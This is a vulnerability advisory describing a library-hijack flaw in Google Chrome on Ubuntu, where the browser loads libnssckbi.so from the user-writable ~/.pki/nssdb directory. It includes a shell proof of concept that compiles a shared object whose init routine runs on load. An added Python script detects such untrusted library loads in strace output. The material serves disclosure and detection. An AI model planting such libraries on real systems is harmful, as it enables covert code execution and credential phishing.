#Vulnerability: Google Chrome code execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com
#Tested-on: Ubuntu 22.04.1

*Description*

Google Chrome attempts to load the shared library 'libnssckbi.so' from a user-writable location:

PATH: /home/$username/.pki/nssdb/libnssckbi.so

Since the path from which the shared library 'libnssckbi.so' is loaded is writable by the user, code execution can be achieved by placing a malicious shared object named `libnssckbi.so` at that path.

*exploit*

Following is the POC that could be used to reproduce the issue:

#!/bin/sh
echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then
    echo "[+] Directory Exists..."
    if [ -w "/home/haalim/.pki/nssdb" ]
    then
        echo "[+] Directory is writable..."
        echo "[+] Generating malicious File libnssckbi.so ..."
        echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
        # The advisory's two further #include lines lost their header names in extraction;
        # stdio.h is all that printf() below needs.
        echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
        echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
        echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
        echo "}" >> /home/haalim/.pki/nssdb/exploit.c
        # -Wl,-init,f registers f() as the library's init routine, so it runs when the .so is loaded
        gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
        gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o
    fi
fi

Upon closing the browser window, the application executes the malicious code.

*Impact*

An attacker can use this behavior to bypass application whitelisting rules. It can also lead to denial-of-service (DoS) attacks. An attacker can also trick a victim into supplying credentials by creating a fake prompt.
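As an added detection example (not part of the advisory or of Chrome's code), the script below scans strace-style openat() lines for shared objects that a process opens, or merely probes for, outside trusted system directories; the allowlist of prefixes and the sample trace lines are constructed assumptions.

```python
"""Flag shared objects opened from outside trusted system prefixes in strace output."""
import re
from pathlib import PurePosixPath

# Hypothetical allowlist of directories a dynamic loader is expected to read
# libraries from on Ubuntu; anything else (e.g. under /home) is suspicious.
TRUSTED_PREFIXES = ("/lib", "/lib64", "/usr/lib", "/usr/lib64", "/opt/google/chrome")

# Matches an `strace -e trace=openat` line: openat(<dirfd>, "<path>", <flags>) = <ret>
OPENAT_RE = re.compile(r'openat\([^,]+, "(?P<path>[^"]+)", [^)]*\)\s*=\s*(?P<ret>-?\d+)')
SHARED_OBJECT_RE = re.compile(r"\.so(\.\d+)*$")


def is_trusted(path: str) -> bool:
    """Component-wise prefix check, so /libfoo/x.so is NOT treated as under /lib."""
    parents = PurePosixPath(path).parents
    return any(PurePosixPath(prefix) in parents for prefix in TRUSTED_PREFIXES)


def find_untrusted_loads(lines):
    """Return [(path, opened_ok)] for every .so opened outside the allowlist.

    A failed open (opened_ok False) still matters: it reveals a location the
    loader probes, which becomes hijackable as soon as the user can write there.
    """
    hits = []
    for line in lines:
        m = OPENAT_RE.search(line)
        if not m or not SHARED_OBJECT_RE.search(m.group("path")):
            continue
        path = m.group("path")
        if not is_trusted(path):
            hits.append((path, int(m.group("ret")) >= 0))
    return hits


# Constructed sample trace (not a real capture) mirroring the advisory's scenario.
SAMPLE_TRACE = """\
openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/libnss3.so", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/home/haalim/.pki/nssdb/cert9.db", O_RDONLY|O_CLOEXEC) = 4
openat(AT_FDCWD, "/home/haalim/.config/plugins/libhelper.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/home/haalim/.pki/nssdb/libnssckbi.so", O_RDONLY|O_CLOEXEC) = 5
"""

if __name__ == "__main__":
    for path, ok in find_untrusted_loads(SAMPLE_TRACE.splitlines()):
        print(f"{'LOADED' if ok else 'PROBED'} {path}")
```

Running it against a real capture (`strace -f -e trace=openat -o chrome.trace google-chrome`) lists every library path the browser consults outside the allowlist, which is the quickest way to confirm or rule out a writable search location like the one above.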